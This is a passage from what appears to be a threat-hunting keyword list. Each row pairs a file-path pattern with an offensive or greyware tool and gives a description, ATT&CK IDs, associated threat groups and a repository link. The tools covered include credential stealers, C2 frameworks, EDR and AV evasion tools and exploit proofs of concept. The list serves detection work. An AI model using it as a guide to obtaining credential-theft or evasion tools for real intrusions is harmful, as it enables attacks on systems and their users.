T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/FindObjects-BOF,1,1,N/A,10,10,263,50,2023-05-03T19:52:08Z,2021-01-11T09:38:52Z -*/FindSQLSrv.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/finger.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/fingerprint-strings.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/firefox_decrypt.git*,offensive_tool_keyword,firefox_decrypt,Firefox Decrypt is a tool to extract passwords from Mozilla,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/unode/firefox_decrypt,1,1,N/A,10,10,1622,283,2023-07-28T15:10:13Z,2014-01-17T13:25:02Z -*/firefox_decrypt.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/firewalk.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/firewall-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/flask:5000/supershell/*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*/flatten-macho.m*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/flume-master-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Fodetect-hooksx64*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*/follina.py*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,1,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z -*/ForgeCert.git*,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,1,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z -*/forkatz.filters*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*/forkatz.git*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*/format:hashcat*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*/FourEye.git*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/fox-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/fox-it/BloodHound*,offensive_tool_keyword,bloodhound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069,TA0007,N/A,N/A,Frameworks,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*/FreeFileSync.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*/FreeFileSync_*_Windows_Setup.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*/FreeFileSyncPortable_*.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*/freelancer-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Freeze.rs*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*/freyja.go*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/freyja_tcp/*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/fritzone/obfy*,offensive_tool_keyword,obfy,A tiny C++ obfuscation framework,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/fritzone/obfy,1,1,N/A,N/A,6,537,122,2020-06-10T13:28:32Z,2015-11-13T13:28:23Z -*/ftp-anon.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-bounce.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/FtpC2/*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,1,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -*/ftp-libopie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-proftpd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-syst.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-vsftpd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-vuln-cve2010-4221.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Fuck-Etw.git*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,1,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*/FuckThatPacker*,offensive_tool_keyword,cobaltstrike,A simple python packer to easily bypass Windows Defender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Unknow101/FuckThatPacker,1,1,N/A,10,10,612,91,2022-04-03T18:20:01Z,2020-08-13T07:26:07Z -*/FudgeC2*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/full-nelson.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/full-nelson64*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/FunctionalC2/*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,1,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*/fuzz.txt*,offensive_tool_keyword,fuzz.txt,list of sensible files for fuzzing in system,T1210 - T1190 - T1203 - T1114,TA0002 - TA0003 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt,1,1,N/A,N/A,10,2669,479,2023-07-20T13:26:37Z,2016-01-19T13:35:44Z -*/fuzzers/dns*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/ftp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/http*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/ntp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/smb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/smtp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/ssh*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/G0ldenGunSec/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/GadgetToJScript.git*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,1,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*/gandcrab.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/ganglia-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/gather/credentials*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and 